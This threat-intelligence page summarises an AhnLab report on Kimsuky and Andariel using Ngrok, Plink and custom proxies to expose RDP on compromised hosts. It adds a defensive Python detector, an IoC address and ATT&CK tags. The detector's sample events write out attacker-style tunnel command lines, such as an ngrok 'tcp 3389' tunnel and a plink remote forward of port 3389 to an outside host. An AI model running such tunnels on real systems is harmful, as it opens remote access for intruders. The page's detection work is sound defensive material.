Detecting Proxy Tools with AhnLab EDR (AhnLab EDR을 활용한 Proxy 도구 탐지)

2024-11-26 Ahnlab Detecting Proxy Tools with AhnLab EDR

https://asec.ahnlab.com/ko/84754/


AhnLab reports that attackers often install proxy tools after compromising a system so that they can reach it over RDP even when it sits behind NAT and is not directly reachable from the internet. The Korean-language article cites Ngrok, Plink, and custom proxy tools, including Kimsuky and Andariel cases in which the operators exposed port 3389 to take remote desktop control of the host. It also notes that one Andariel proxy tool matched tooling Lazarus used in 2021, and that proxy tools were newly identified in Kimsuky samples across several attacks. The defensive value lies in endpoint telemetry: process-creation and command-line records for Ngrok, Plink, and otherwise unexplained proxy executables expose the remote-control and persistence stage before the attackers deepen their access.
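The detection idea above, worked through as an added Python example (not AhnLab's code, and not how AhnLab EDR implements its rules): a few heuristics run over process-creation events that flag Ngrok-style `tcp 3389` tunnels, Plink/SSH `-R` remote forwards whose destination is 3389, unknown binaries in user-writable directories that take 3389 as an argument (the custom-proxy case), and any command line referencing the IoC address published on this page. The `ProcEvent` shape, the tool-name set, the user-writable directory list and all sample events are assumptions constructed for the example; only 172.93.181.238 comes from the page.

```python
"""Heuristics for spotting proxy/tunnel tools that expose RDP (TCP 3389) in
process-creation telemetry. Example code added for this page, not AhnLab's."""
import re
from dataclasses import dataclass

RDP_PORT = "3389"
RDP_PORT_TOKEN = re.compile(rf"\b{RDP_PORT}\b")  # "3389" but not "33389"

# Assumption: image names worth alerting on by themselves. Attackers often
# rename binaries, so the command-line rules below must not depend on this.
TUNNEL_TOOL_NAMES = {"ngrok.exe", "plink.exe", "ssh.exe"}

# Directories a non-admin user can normally write to (assumption, Windows).
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")

# The one network indicator published on this page.
IOC_IPS = {"172.93.181.238"}

# ngrok syntax: "ngrok tcp [options] 3389"; matching the arguments rather than
# the image name still works when the binary has been renamed.
NGROK_TCP = re.compile(r"\btcp\b(?:\s+\S+)*?\s+(\d{1,5})\b", re.IGNORECASE)


@dataclass
class ProcEvent:
    image: str    # full path of the new process image
    cmdline: str  # command line as recorded by the sensor
    parent: str   # parent image name


@dataclass
class Finding:
    rule: str
    image: str
    detail: str


def image_name(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ssh_remote_forward(argv):
    """Return (dest_host, dest_port) from a plink/ssh -R spec, else None.
    Handles both "-R spec" and "-Rspec"; the destination is the last two
    colon-separated fields, so an optional bind address is tolerated."""
    for i, tok in enumerate(argv):
        if tok == "-R" and i + 1 < len(argv):
            spec = argv[i + 1]
        elif tok.startswith("-R") and len(tok) > 2:
            spec = tok[2:]
        else:
            continue
        parts = spec.split(":")
        if len(parts) >= 3:
            return parts[-2], parts[-1]
    return None


def analyze(ev: ProcEvent):
    """Run every rule against one event and return the findings (possibly none)."""
    findings = []
    name = image_name(ev.image)
    path = ev.image.replace("/", "\\").lower()
    argv = ev.cmdline.split()  # naive split; real telemetry needs quote-aware parsing

    if name in TUNNEL_TOOL_NAMES:
        findings.append(Finding("known-tunnel-tool", ev.image, f"{name} executed, parent {ev.parent}"))

    m = NGROK_TCP.search(ev.cmdline)
    if m and m.group(1) == RDP_PORT:
        findings.append(Finding("ngrok-tcp-rdp", ev.image, "ngrok-style 'tcp 3389' tunnel"))

    fwd = ssh_remote_forward(argv)
    if fwd and fwd[1] == RDP_PORT:
        findings.append(Finding("ssh-remote-forward-rdp", ev.image, f"-R forwards to {fwd[0]}:{fwd[1]}"))

    # Also catches custom proxies: an unknown binary in a user-writable
    # directory that takes the RDP port as an argument.
    if path.startswith(USER_WRITABLE_PREFIXES) and RDP_PORT_TOKEN.search(ev.cmdline):
        findings.append(Finding("rdp-port-from-user-writable-path", ev.image, "3389 on the command line"))

    for ip in IOC_IPS:
        if ip in ev.cmdline:
            findings.append(Finding("ioc-ip-in-cmdline", ev.image, ip))
    return findings


def scan(events):
    return [f for ev in events for f in analyze(ev)]


# Constructed sample events (not real telemetry): paths, command lines and the
# 203.0.113.10 address are illustrative; 172.93.181.238 is the page's IoC.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Users\Public\ngrok.exe", "ngrok.exe tcp 3389", "cmd.exe"),
    ProcEvent(r"C:\Windows\Temp\plink.exe",
              "plink.exe -N -R 0.0.0.0:33389:127.0.0.1:3389 user@203.0.113.10 -pw x",
              "powershell.exe"),
    ProcEvent(r"C:\Program Files\PuTTY\plink.exe", "plink.exe -ssh user@example.com", "explorer.exe"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs", "services.exe"),
    ProcEvent(r"C:\ProgramData\update.exe", "update.exe 172.93.181.238 443 127.0.0.1 3389", "wscript.exe"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:34} {f.image}  ({f.detail})")
```

The third sample (Plink run from its normal install path with a plain `-ssh` session) trips only the image-name rule, which is the point: a name match alone is noisy and misses renamed binaries, while the argument-based rules fire on the tunnel semantics regardless of what the file is called. In a real deployment the parent process (a script host or shell spawning the tunnel) and the user-writable path are the fields that separate the Kimsuky/Andariel pattern from an administrator's legitimate SSH use.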

Indicators of Compromise

Type Value First Seen Last Seen
IPv4 172.93.181.238 2024-11-26 2024-11-26

Related Actors

First seen: Jul 2017
Last seen: May 2026

Related Reports

2024-07-19 • 65% Match
#Trend #Andariel #Kimsuky #MoonstoneSleet #Lazarus #T1082 #T1059.003 #T1090 #T1140 #T1005 #T1070.004 #T1041 #T1113 #T1555 #T1560 #T1071.001 #T1046 #T1112 #T1115 #T1083 #T1497 #T1056.001 #T1036 #T1027 #T1204.002 #T1566.002 #T1555.003 #T1071 #T1124 #T1222 #T1552 #T1057 #T1583.003 #T1518.001 #T1547.001 #T1053.005 #T1539 #T1608.005 #T1583.001 #T1059.001 #T1053 #T1552.001 #T1566 #T1059 #T1003 #T1497.001 #T1102.001 #T1574.002 #T1562.001 #T1490 #T1486 #T1129 #T1133 #T1571 #T1548 #T1190 #T1203 #T1564.001 #T1087 #T1562.004 #T1218.011 #T1070.006 #T1547 #T1068 #T1614 #T1573 #T1095 #T1562 #T1070 #T1047 #T1056 #T1176 #T1010 #T1033 #T1569.002 #T1543.003 #T1485 #T1012 #T1202 #T1087.002 #T1021.004 #T1222.001 #T1518 #T1564.003 #T1505.003 #T1069.002 #T1564 #T1595.002 #T1027.005 #T1070.001 #T1056.004 #T1584
Shares tags: Andariel, Kimsuky, Lazarus